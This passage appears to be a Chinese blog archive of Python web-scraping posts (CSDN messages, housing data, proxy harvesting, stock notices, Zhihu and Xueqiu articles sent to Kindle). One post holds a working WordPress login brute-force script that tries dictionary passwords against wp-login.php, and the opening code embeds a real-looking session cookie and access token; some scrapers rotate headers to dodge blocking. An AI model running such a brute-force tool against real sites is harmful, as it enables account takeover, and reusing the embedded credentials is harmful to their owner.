    header['Cookie'] = 'uuid_tt_dd=-5697318013068753627_20160111; _ga=GA1.2.795042232.1452766190; _message_m=quvq2wle24wa4awe UserInfo=zMhiNgesgIlEBQ3TOqLCtx4nUI360IIq3ciBzg4EKH%2FW8mSpTANpu5cTlRFLj2Tqh%2FZzQr2rNqDtT1SZz%2Be2%2FpDkGoQxDK3IVUZXvwZ%2FEP1I4UTg6MoZkH7LDO3sjrJJ; UserNick=%E9%87%8D%E5%A4%8D%E7%9A%84%E7%94%9F%E6%B4%BB; AU=0F1; UD=%E8%AE%B0%E5%BD%95%E8%87%AA%E5%AD%A6%E7%9A%84%E5%8E%86%E7%A8%8B+%E5%88%83%E8%8D%; BT=1490707396344; access-token=c2e12bff-5b27-4a91-953b-448ff6f6beac; _csdn_notify_admin_session=VE41a0d3TitrVGY2bGtXY09pZENwR1lHenhUU1NVaWc1b04wL1I3dCtDQVdadWpjMXBzdGRJL0RZR04wYldvZDBhTU96b2oycVVKeVI1UEVyUHFKbG1yNnB2b2pHRWVnWG1uc2JMM2R3YWthakRyTXZNaEpVU1NtUy9zQUJrNjd3R2lpbG5PK0paMnlyc1dyK0lTZUtRPT0tLXlPQUE1QzF5UmhDNjEvSFdtRFlQS2c9PQ%3D%3D--4569c5a32916dcf969a8b7e007c37abeb90be4f3; dc_tos=onj1dg; dc_session_id=1490707393375; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1490024083,1490024559,1490374375,1490707368; Hm_lpvt_6bcd52f51e9b3dce32bec4a3997715ac=1490707638'
    header['Cache-Control'] = 'max-age=0'
    header['Host'] = 'msg.csdn.net'
    header['Referer'] = 'http://blog.csdn.net/username'
    resp = requests.get(url, headers=header)
    print resp.text
In the code above, change the cookie and the Referer link to your own username, and you can read your CSDN messages — the comments and replies people left on your CSDN blog.

The catch is that the cookie is only valid for a window of time; its lifetime is roughly a week or so.

With solid packet-capture skills, who needs simulated login?

http://30daydo.com/publish/article/155

Python crawler: the ultimate fix for garbled Chinese with urllib/requests

李魔佛 posted an article • 0 comments • 1291 views • 2017-03-11 16:17

If you're using the requests package:

content = requests.get(url, headers=self.header)
content.encoding = 'gbk'
print content.text

Normally content.text prints the page content directly, but if the page's encoding isn't utf-8 you have to set it by hand:

content.encoding = 'gbk'

and then content.text displays the Chinese correctly.
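If you don't know the page's encoding in advance, requests can also guess it from the content; this is a small addition of mine:

content = requests.get(url, headers=self.header)
content.encoding = content.apparent_encoding  # let requests detect the charset
print content.text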
 

Auto-grabbing Xueqiu red packets — Python code

李魔佛 posted an article • 0 comments • 7019 views • 2017-01-25 12:29

ETA 1.30
Link: https://github.com/Rockyzsu/red_bag
 
 

Automatically fetch the daily new-home and second-hand-home transaction volumes for Shenzhen, Shanghai, and Beijing

李魔佛 posted an article • 2 comments • 9620 views • 2016-10-10 14:28

Watching from the sidelines; the current market is not one to wade into.

Shenzhen Real Estate Information System: http://ris.szpl.gov.cn/

(screenshots 一手.PNG and house.PNG omitted)
#-*-coding=utf-8-*-
__author__ = 'rocky'
# fetch Shenzhen's daily new-home and second-hand-home deal counts and floor area, and write them to the database
# essentially just regex-extracting a few numbers
import urllib2, re
import database

def getContent():
    url = "http://ris.szpl.gov.cn/"
    one_hand = "credit/showcjgs/ysfcjgs.aspx"
    second_hand = "credit/showcjgs/esfcjgs.aspx"
    req = urllib2.Request(url + one_hand)
    content = urllib2.urlopen(req).read()
    # this returns the raw page source -- no anti-crawler measures at all on a government site, heh
    # print content
    date = re.compile(r'<SPAN class=titleblue><span id=\"lblCurTime5\">(.*)</span>')
    reg = re.compile(r'<td width="14%"><b>(\d+)</b>')
    result = reg.findall(content)
    current_date = date.findall(content)

    reg2 = re.compile(r'<td align="right"><b>(.*?)</b>')
    yishou_area = reg2.findall(content)

    print current_date[0]
    print '一手商品房成交套数:%s' % result[0]
    print '一手商品房成交面积: %s' % yishou_area[0]

    sec_req = urllib2.Request(url + second_hand)
    sec_content = urllib2.urlopen(sec_req).read()

    sec_quantity = re.compile(r'<td width="30%">(\d+)</td>')
    sec_result = sec_quantity.findall(sec_content)
    second_area = re.findall(r'<td align="right">(.*?)</td>', sec_content)

    print '二手商品房成交套数:%s' % sec_result[1]
    print '二手商品房成交面积: %s' % second_area[2]
    database.create_table()
    database.insert(current_date[0], result[0], yishou_area[0], sec_result[1], second_area[2])

getContent()
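The database module imported above isn't shown in the post; a minimal sqlite3 sketch of what create_table/insert might look like (my own assumption, not the author's actual code; the file and column names are hypothetical):

# database.py
import sqlite3

DB = 'house.db'  # hypothetical file name

def create_table():
    conn = sqlite3.connect(DB)
    conn.execute('''CREATE TABLE IF NOT EXISTS HOUSE
                    (DATE TEXT, NEW_QTY TEXT, NEW_AREA TEXT,
                     SEC_QTY TEXT, SEC_AREA TEXT);''')
    conn.commit()
    conn.close()

def insert(date, new_qty, new_area, sec_qty, sec_area):
    conn = sqlite3.connect(DB)
    conn.execute('INSERT INTO HOUSE VALUES (?,?,?,?,?)',
                 (date, new_qty, new_area, sec_qty, sec_area))
    conn.commit()
    conn.close()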
GitHub code: https://github.com/Rockyzsu/house
 

Python crawler to fetch XiciDaili proxy IPs

李魔佛 posted an article • 20 comments • 12371 views • 2016-08-11 23:17

By default it fetches the first 5 pages of proxy IPs, checks whether each is alive, and stores the results with sqlite in a local db file.

(screenshot proxy.PNG omitted)
import datetime
import sqlite3
import time
import urllib2

from lxml import etree


class getProxy():

    def __init__(self):
        self.user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.header = {"User-Agent": self.user_agent}
        self.dbname = "proxy.db"
        self.now = time.strftime("%Y-%m-%d")

    def getContent(self, num):
        nn_url = "http://www.xicidaili.com/nn/" + str(num)
        # domestic high-anonymity proxies
        req = urllib2.Request(nn_url, headers=self.header)
        resp = urllib2.urlopen(req, timeout=10)
        content = resp.read()
        et = etree.HTML(content)
        result_even = et.xpath('//tr[@class=""]')
        result_odd = et.xpath('//tr[@class="odd"]')
        # the page source alternates between two classes for odd/even rows, so with lxml the
        # simplest approach is to fetch them separately.
        # at first I used a single query and got lots of mismatched rows -- the site probably
        # tweaks its source regularly to shake off other crawlers.
        # done this way, the ip and port can be extracted however the page changes
        for i in result_even:
            t1 = i.xpath("./td/text()")[:2]
            print "IP:%s\tPort:%s" % (t1[0], t1[1])
            if self.isAlive(t1[0], t1[1]):
                self.insert_db(self.now, t1[0], t1[1])
        for i in result_odd:
            t2 = i.xpath("./td/text()")[:2]
            print "IP:%s\tPort:%s" % (t2[0], t2[1])
            if self.isAlive(t2[0], t2[1]):
                self.insert_db(self.now, t2[0], t2[1])
Next, the insert-into-database function:

    def insert_db(self, date, ip, port):
        dbname = self.dbname
        try:
            conn = sqlite3.connect(dbname)
        except:
            print "Error to open database %s" % self.dbname
        create_tb = '''
        CREATE TABLE IF NOT EXISTS PROXY
        (DATE TEXT,
        IP TEXT,
        PORT TEXT
        );
        '''
        conn.execute(create_tb)
        insert_db_cmd = '''
        INSERT INTO PROXY (DATE,IP,PORT) VALUES ('%s','%s','%s');
        ''' % (date, ip, port)  # write the date, ip and port
        conn.execute(insert_db_cmd)
        conn.commit()  # remember to commit
        conn.close()





Then the check for whether a proxy is still usable:

    # check whether a scraped proxy IP still works
    def isAlive(self, ip, port):
        proxy = {'http': ip + ':' + port}
        print proxy

        # note this installs the proxy globally
        proxy_support = urllib2.ProxyHandler(proxy)
        opener = urllib2.build_opener(proxy_support)
        urllib2.install_opener(opener)
        # verify the proxy by visiting Tencent's homepage through it
        test_url = "http://www.qq.com"
        req = urllib2.Request(test_url, headers=self.header)
        try:
            # timeout is 10; if you can't stand proxies slower than that, lower the number
            resp = urllib2.urlopen(req, timeout=10)

            if resp.code == 200:
                print "work"
                return True
            else:
                print "not work"
                return False
        except:
            print "Not work"
            return False
To fetch the first however-many pages of proxy IPs, a simple loop does it:

    def loop(self, page):
        for i in range(1, page):
            self.getContent(i)

Update 2016-08-13
Next up is cleaning the existing database: dead proxies should be removed. To be continued... (a sketch of one way to do it follows)
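A minimal sketch of such a cleanup pass, reusing isAlive above (my own sketch, not the author's code):

    def clean_db(self):
        conn = sqlite3.connect(self.dbname)
        rows = conn.execute('SELECT DATE, IP, PORT FROM PROXY').fetchall()
        for date, ip, port in rows:
            if not self.isAlive(ip, port):
                # drop proxies that no longer respond
                conn.execute('DELETE FROM PROXY WHERE IP=? AND PORT=?', (ip, port))
        conn.commit()
        conn.close()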
 
 
 
Instantiating the class, set to crawl the first 5 pages of proxy ips:

if __name__ == "__main__":
    now = datetime.datetime.now()
    print "Start at %s" % now
    obj = getProxy()
    obj.loop(5)

The latest source code is at
https://github.com/Rockyzsu/getProxy
— sync up.

Python: fetching announcements from cnstock (中国证券网)

李魔佛 posted an article • 11 comments • 11025 views • 2016-06-30 15:45

China Securities Journal online (中国证券网): http://ggjd.cnstock.com/
This site's announcements come out a bit earlier than Tonghuashun's or East Money's. There have even been mornings where cnstock had already published an announcement that East Money only ran as a midday notice, so you can get announcements early and position ahead of time.

The program now automatically stores the scraped announcements on this site: http://30daydo.com/news.php
It updates once a day at 8:30 am.

The generated announcements are saved under the stock/ folder, named by date. The script below polls in a loop and keeps generating files whenever new announcements appear.

By default it saves the first 3 pages of announcements (fetching too many pages at once gets you temporarily blocked by the site for a few minutes). The code also rotates headers to dodge the site's blocking.

Change the number in
getInfo(3)
to scrape a different number of leading pages.

(screenshot 公告.PNG omitted)
__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os, sys


def getInfo(max_index_user=5):
    stock_news_site = "http://ggjd.cnstock.com/gglist/search/ggkx/"

    my_userAgent = [
        'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
        'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
        'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
        'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
    index = 0
    max_index = max_index_user
    num = 1
    temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

    store_filename = "StockNews-%s.log" % temp_time
    fOpen = codecs.open(store_filename, 'w', 'utf-8')

    while index < max_index:
        user_agent = random.choice(my_userAgent)
        # print user_agent
        company_news_site = stock_news_site + str(index)
        # content = urllib2.urlopen(company_news_site)
        headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
                   'Accept': 'text/html, application/xhtml+xml, */*', }
        req = urllib2.Request(url=company_news_site, headers=headers)
        resp = None
        raw_content = ""
        try:
            resp = urllib2.urlopen(req, timeout=30)

        except urllib2.HTTPError as e:
            e.fp.read()
        except urllib2.URLError as e:
            if hasattr(e, 'code'):
                print "error code %d" % e.code
            elif hasattr(e, 'reason'):
                print "error reason %s " % e.reason

        finally:
            if resp:
                raw_content = resp.read()
            time.sleep(2)
            resp.close()

        soup = BeautifulSoup(raw_content, "html.parser")
        all_content = soup.find_all("span", "time")

        for i in all_content:
            news_time = i.string
            node = i.next_sibling
            str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
            # print "inside %d" % num
            # print str_temp
            fOpen.write(str_temp)
            num = num + 1

        # print "index %d" % index
        index = index + 1

    fOpen.close()


def execute_task(n=60):
    period = int(n)
    while True:
        print datetime.datetime.now()
        getInfo(3)

        time.sleep(60 * period)


if __name__ == "__main__":

    sub_folder = os.path.join(os.getcwd(), "stock")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    start_time = time.time()  # user can change the max index number getInfo(10), by default is getInfo(5)
    if len(sys.argv) < 2:
        n = raw_input("Input Period : ? mins to download every cycle")
    else:
        n = int(sys.argv[1])
    execute_task(n)
    end_time = time.time()
    print "Total time: %s s." % str(round((end_time - start_time), 4))
 
github:https://github.com/Rockyzsu/cnstock
 

python 批量获取色影无忌 获奖图片

李魔佛 发表了文章 • 6 个评论 • 9447 次浏览 • 2016-06-29 16:41 • 来自相关话题

色影无忌上的图片很多都可以直接拿来做壁纸的,而且发布面不会太广,基本不会和市面上大部分的壁纸或者图片素材重复。 关键还没有水印。 这么良心的图片服务商哪里找呀~~
 

 





 
不多说,直接来代码:

#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
    def __init__(self):
        self.url="http://photo.xitek.com/"
        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.headers={"User-Agent":user_agent}
        self.last_page=self.__get_last_page()


    def __get_last_page(self):
        html=self.__getContentAuto(self.url)
        bs=BeautifulSoup(html,"html.parser")
        page=bs.find_all('a',class_="blast")
        last_page=page[0]['href'].split('/')[-1]
        return int(last_page)


    def __getContentAuto(self,url):
        req=urllib2.Request(url,headers=self.headers)
        resp=urllib2.urlopen(req)
        #time.sleep(2*random.random())
        content=resp.read()
        info=resp.info().get("Content-Encoding")
        if info==None:
            return content
        else:
            t=StringIO.StringIO(content)
            gziper=gzip.GzipFile(fileobj=t)
            html = gziper.read()
            return html

    #def __getFileName(self,stream):


    def __download(self,url):
        p=re.compile(r'href="(/photoid/\d+)"')
        #html=self.__getContentNoZip(url)

        html=self.__getContentAuto(url)

        content = p.findall(html)
        for i in content:
            print i

            photoid=self.__getContentAuto(self.url+i)
            bs=BeautifulSoup(photoid,"html.parser")
            final_link=bs.find('img',class_="mimg")['src']
            print final_link
            #pic_stream=self.__getContentAuto(final_link)
            title=bs.title.string.strip()
            filename = re.sub('[\/:*?"<>|]', '-', title)
            filename=filename+'.jpg'
            urllib.urlretrieve(final_link,filename)
            #f=open(filename,'w')
            #f.write(pic_stream)
            #f.close()
        #print html
        #bs=BeautifulSoup(html,"html.parser")
        #content=bs.find_all(p)
        #for i in content:
        #    print i
        '''
        print bs.title
        element_link=bs.find_all('div',class_="element")
        print len(element_link)
        k=1
        for href in element_link:

            #print type(href)
            #print href.tag
        '''
        '''
            if href.children[0]:
                print href.children[0]
        '''
        '''
            t=0

            for i in href.children:
                #if i.a:
                if t==0:
                    #print k
                    if i['href']
                    print link

                        if p.findall(link):
                            full_path=self.url[0:len(self.url)-1]+link
                            sub_html=self.__getContent(full_path)
                            bs=BeautifulSoup(sub_html,"html.parser")
                            final_link=bs.find('img',class_="mimg")['src']
                            #time.sleep(2*random.random())
                            print final_link
                    #k=k+1
                #print type(i)
                #print i.tag
                #if hasattr(i,"href"):
                    #print i['href']
                #print i.tag
                t=t+1
                #print "*"

        '''

        '''
            if href:
                if href.children:
                    print href.children[0]
        '''
            #print "one element link"



    def getPhoto(self):

        start=0
        #use style/0
        photo_url="http://photo.xitek.com/style/0/p/"
        for i in range(start,self.last_page+1):
            url=photo_url+str(i)
            print url
            #time.sleep(1)
            self.__download(url)

        '''
        url="http://photo.xitek.com/style/0/p/10"
        self.__download(url)
        '''
        #url="http://photo.xitek.com/style/0/p/0"
        #html=self.__getContent(url)
        #url="http://photo.xitek.com/"
        #html=self.__getContentNoZip(url)
        #print html
        #'''
def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    obj=Xitek()
    obj.getPhoto()


if __name__=="__main__":
    main()








运行后,脚本会把抓到的所有图片自动保存在content文件夹下。 (色影无忌的服务器没有做任何的屏蔽处理,所以脚本不能跑那么快,可以适当调用sleep函数,不要让服务器压力那么大)
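比如可以在 __download 的 for 循环末尾加一行随机延时(示意,用的都是脚本里已经 import 的 time 和 random,代码里其实也留了一行被注释掉的同样写法):

# 示意:每下载一张图随机休眠0~2秒,降低服务器压力
time.sleep(2 * random.random())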
 
已经下载好的图片:





 
 
github: https://github.com/Rockyzsu/fetchXitek   (欢迎前来star)

抓取 知乎日报 中的 大误 系列文章,生成电子书推送到kindle

李魔佛 发表了文章 • 0 个评论 • 2866 次浏览 • 2016-06-12 08:52 • 来自相关话题

无意中看了知乎日报的大误系列的一篇文章,之后就停不下来了。大误是虚构故事,知乎上神人虚构故事的功力要高于网络上的很多写手啊!! 看得欲罢不能,不过还是那句,手机屏幕太小,连续看几个小时很疲劳,而且每次都要联网去看。 
 
所以写了下面的python脚本,一劳永逸。 脚本抓取大误从开始到现在的所有文章,并推送到你自己的kindle账号。
 




# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs, sys, datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')


def save2file(filename, content):
    filename = filename + ".txt"
    f = codecs.open(filename, 'a', encoding='utf-8')
    f.write(content)
    f.close()


def getPost(date_time, filter_p):
    url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
    user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    header = {"User-Agent": user_agent}
    req = urllib2.Request(url, headers=header)
    resp = urllib2.urlopen(req)
    content = resp.read()
    p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
    result = re.findall(p, content)
    count = -1
    row = -1
    for i in result:
        # print i
        return_content = re.findall(filter_p, i)
        if return_content:
            row = count
            break
        # print return_content[0]
        count = count + 1
    # print row
    if row == -1:
        return 0
    link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
    link_result = re.findall(link_p, content)[row + 1]
    print link_result
    result_req = urllib2.Request(link_result, headers=header)
    result_resp = urllib2.urlopen(result_req)
    # result_content = result_resp.read()
    # print result_content

    bs = BeautifulSoup(result_resp, "html.parser")
    title = bs.title.string.strip()
    # print title
    filename = re.sub('[\/:*?"<>|]', '-', title)
    print filename
    print date_time
    save2file(filename, title)
    save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" % date_time)

    detail_content = bs.find_all('div', class_='content')

    for i in detail_content:
        # print i
        save2file(filename, "\n\n-------------------------answer -------------------------\n\n")
        for j in i.strings:
            save2file(filename, j)

    smtp_server = 'smtp.126.com'
    from_mail = sys.argv[1]
    password = sys.argv[2]
    to_mail = 'jinweizsu@kindle.cn'
    send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
    send_kindle.send_txt(filename)


def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)

    date_time = '20160611'
    filter_p = re.compile('大误.*')
    ori_day = datetime.date(datetime.date.today().year, 01, 01)
    t = datetime.date(datetime.date.today().year, datetime.date.today().month, datetime.date.today().day)
    delta = (t - ori_day).days
    print delta
    for i in range(delta):
        day = datetime.date(datetime.date.today().year, 01, 01) + datetime.timedelta(i)
        getPost(day.strftime("%Y%m%d"), filter_p)
    # getPost(date_time, filter_p)


if __name__ == "__main__":
    main()




github: https://github.com/Rockyzsu/zhihu_daily__kindle
 
上面的代码可以稍作修改,就可以抓取瞎扯或者深夜食堂的系列文章。
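比如只需要把 main() 里的过滤正则换掉即可(示意):

filter_p = re.compile('瞎扯.*')        # 改抓“瞎扯”系列
# filter_p = re.compile('深夜食堂.*')   # 或者“深夜食堂”系列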
 
附福利:
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。(截止2016/6/12日)

python雪球爬虫 抓取雪球 大V的所有文章 推送到kindle

李魔佛 发表了文章 • 0 个评论 • 7462 次浏览 • 2016-05-29 00:06 • 来自相关话题

30天内完成。 开始日期:2016年5月28日
 
因为雪球上喷子很多,不少大V都不堪忍受,被喷的删帖离开。 比如 易碎品,小小辛巴。
所以利用python可以有效便捷地抓取想要的大V发言内容,并保存到本地,也方便自己检索、考证(有些伪大V喜欢频繁删帖,比如今天预测明天大盘大涨,明天暴跌后就把昨天的预测给删掉,给后来者造成该大V每次都能精准预测的错觉)。 
 
下面以 抓取狂龙的帖子为例(狂龙最近老是掀人家庄家的老底,哈)
 
https://xueqiu.com/4742988362 
 
2017年2月20日更新:
爬取雪球上我的收藏的文章,并生成电子书。
(PS:收藏夹中一些文章已经被作者删掉了 - -|, 这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸)
 




# -*-coding=utf-8-*-
# 抓取雪球的收藏文章
__author__ = 'Rocky'
import requests, cookielib, re, json, time
from toolkit import Toolkit
from lxml import etree

url = 'https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
    session.cookies.load(ignore_discard=True)
except:
    print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
           'Referer': 'https://xueqiu.com/',
           'Origin': 'https://xueqiu.com',
           'User-Agent': agent}
account = Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data = {'username': account['snowball_user'], 'password': account['snowball_password']}
s = session.post(url, data=data, headers=headers)
print s.status_code
# print s.text
session.cookies.save()
fav_temp = 'https://xueqiu.com/favs?page=1'
collection = session.get(fav_temp, headers=headers)
fav_content = collection.text
p = re.compile('"maxPage":(\d+)')
maxPage = p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage = int(maxPage)
print type(maxPage)
for i in range(1, maxPage + 1):
    fav = 'https://xueqiu.com/favs?page=%d' % i
    collection = session.get(fav, headers=headers)
    fav_content = collection.text
    # print fav_content
    p = re.compile('var favs = {(.*?)};', re.S | re.M)
    result = p.findall(fav_content)[0].strip()

    new_result = '{' + result + '}'
    # print type(new_result)
    # print new_result
    data = json.loads(new_result)
    use_data = data['list']
    host = 'https://xueqiu.com'
    for i in use_data:
        url = host + i['target']
        print url
        txt_content = session.get(url, headers=headers).text
        # print txt_content.text

        tree = etree.HTML(txt_content)
        title = tree.xpath('//title/text()')[0]

        filename = re.sub('[\/:*?"<>|]', '-', title)
        print filename

        content = tree.xpath('//div[@class="detail"]')
        for i in content:
            Toolkit.save2filecn(filename, i.xpath('string(.)'))
        # print content
        # Toolkit.save2file(filename,)
        time.sleep(10)





 
用法:
1. snowball.py -- 抓取雪球上我的收藏的文章
使用: 创建一个data.cfg的文件,里面格式如下:
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行python snowball.py ,会自动登录雪球,然后在当前目录生成txt文件。
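Toolkit.getUserData 的实现不在本文贴出的代码里,大致就是把这种 key=value 格式的配置文件解析成字典,示意如下(只是猜测性的草图,具体实现以 github 仓库为准):

# 示意:解析key=value格式的data.cfg,返回字典
def getUserData(cfg_file):
    account = {}
    with open(cfg_file) as f:
        for line in f:
            line = line.strip()
            if line and '=' in line:
                key, value = line.split('=', 1)
                account[key] = value
    return account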
 
github代码:https://github.com/Rockyzsu/xueqiu

python 暴力破解wordpress博客后台登陆密码

低调的哥哥 发表了文章 • 0 个评论 • 8972 次浏览 • 2016-05-13 17:49 • 来自相关话题

自己曾经折腾过一阵子wordpress的博客,说实话,wordpress在博客系统里面算是功能很强大的了,没有之一。
不过用wordpress的朋友可能都是贪图方便,很多设置都用的是默认值。我之前使用的某一个wordpress版本中,它的后台没有任何干扰的验证码(因为它默认给用户关闭了,需要自己去后台开启,而一般用户用的就是缺省设置)。
 






所以只要使用python+urllib库,就可以循环枚举出用户的密码。而用户名在wordpress博客中就是博客发布人的名字。
 
所以以后用wordpress的博客用户,平时还是把图片验证码的功能开启,这样安全性会高很多。(其实python也带有一个破解验证码的库  - 。-!)

# coding=utf-8
# 破解wordpress 后台用户密码
import urllib, urllib2, time, re, cookielib, sys


class wordpress():
    def __init__(self, host, username):
        # 初始化定义 header ,避免被服务器屏蔽
        self.username = username
        self.http = "http://" + host
        self.url = self.http + "/wp-login.php"
        self.redirect = self.http + "/wp-admin/"
        self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
        self.referer = self.http + "/wp-login.php"
        self.cook = "wordpress_test_cookie=WP+Cookie+check"
        self.host = host
        self.headers = {'User-Agent': self.user_agent, "Cookie": self.cook, "Referer": self.referer, "Host": self.host}
        self.cookie = cookielib.CookieJar()
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))

    def crash(self, filename):
        try:
            pwd = open(filename, 'r')
            # 读取密码文件,密码文件中密码越多破解的概率越大
            while 1:
                i = pwd.readline()
                if not i:
                    break

                data = urllib.urlencode(
                    {"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
                Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
                # 构造好数据包之后提交给wordpress网站后台
                Resp = urllib2.urlopen(Req)
                result = Resp.read()
                # print result
                login = re.search(r'login_error', result)
                # 判断返回来的字符串,如果有login error说明失败了。
                if login:
                    pass
                else:
                    print "Crashed! password is %s %s" % (self.username, i.strip())
                    g = open("wordpress.txt", 'w+')
                    g.write("Crashed! password is %s %s" % (self.username, i.strip()))
                    pwd.close()
                    g.close()
                    # 如果匹配到密码, 则这次任务完成,退出程序
                    exit()
                    break

            pwd.close()

        except Exception, e:
            print "error"
            print e
            print "Error in reading password"


if __name__ == "__main__":
    print "begin at " + time.ctime()
    host = sys.argv[1]
    # url = "http://" + host
    # 给程序提供参数,为你要破解的网址
    user = sys.argv[2]
    dictfile = sys.argv[3]
    # 提供你事先准备好的密码文件
    obj = wordpress(host, user)
    # obj.check(dictfile)
    obj.crash(dictfile)
    # obj.crash_v()
    print "end at " + time.ctime()





 
github源码:https://github.com/Rockyzsu/crashWordpressPassword
 

python爬虫 模拟登陆知乎 推送知乎文章到kindle电子书 获取自己的关注问题

低调的哥哥 发表了文章 • 0 个评论 • 23786 次浏览 • 2016-05-12 17:53 • 来自相关话题

平时逛知乎,上班的时候看到一些好的答案,不过由于答案太长,没来得及看完,所以自己写了个python脚本,把自己想要的答案抓取下来,并且推送到kindle上,下班后用kindle再慢慢看。 平时喜欢的内容也可以整理成电子书抓取下来,等周末闲时看。
 
#2016-08-19更新:
添加了模拟登陆知乎的模块,自动获取自己关注的问题id,然后把这些问题的所有答案抓取下来推送到kindle











# -*-coding=utf-8-*-
__author__ = 'Rocky'
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
from email import Encoders, Utils
import urllib2
import time
import re
import sys
import os

from bs4 import BeautifulSoup

from email.Header import Header

reload(sys)
sys.setdefaultencoding('utf-8')


class GetContent():
    def __init__(self, id):
        # 给出的第一个参数 就是你要下载的问题的id
        # 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574
        # 那么 就输入 python zhihu.py 29372574
        id_link = "/question/" + id
        self.getAnswer(id_link)

    def save2file(self, filename, content):
        # 保存为电子书文件
        filename = filename + ".txt"
        f = open(filename, 'a')
        f.write(content)
        f.close()

    def getAnswer(self, answerID):
        host = "http://www.zhihu.com"
        url = host + answerID
        print url
        user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        # 构造header 伪装一下
        header = {"User-Agent": user_agent}
        req = urllib2.Request(url, headers=header)

        try:
            resp = urllib2.urlopen(req)
        except:
            print "Time out. Retry"
            time.sleep(30)
            # try to switch with proxy ip
            resp = urllib2.urlopen(req)
        # 这里已经获取了 网页的代码,接下来就是提取你想要的内容。 使用beautifulSoup 来处理,很方便
        try:
            bs = BeautifulSoup(resp)
        except:
            print "Beautifulsoup error"
            return None

        title = bs.title
        # 获取的标题

        filename_old = title.string.strip()
        print filename_old
        filename = re.sub('[\/:*?"<>|]', '-', filename_old)
        # 用来保存内容的文件名,因为文件名不能有一些特殊符号,所以使用正则表达式过滤掉

        self.save2file(filename, title.string)

        detail = bs.find("div", class_="zm-editable-content")

        self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")
        # 获取问题的补充内容

        if detail is not None:
            for i in detail.strings:
                self.save2file(filename, unicode(i))

        answer = bs.find_all("div", class_="zm-editable-content clearfix")
        k = 0
        index = 0
        for each_answer in answer:
            self.save2file(filename, "\n\n-------------------------answer %s via -------------------------\n\n" % k)
            for a in each_answer.strings:
                # 循环获取每一个答案的内容,然后保存到文件中
                self.save2file(filename, unicode(a))
            k += 1
            index = index + 1

        smtp_server = 'smtp.126.com'
        from_mail = 'your@126.com'
        password = 'yourpassword'
        to_mail = 'yourname@kindle.cn'

        # send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
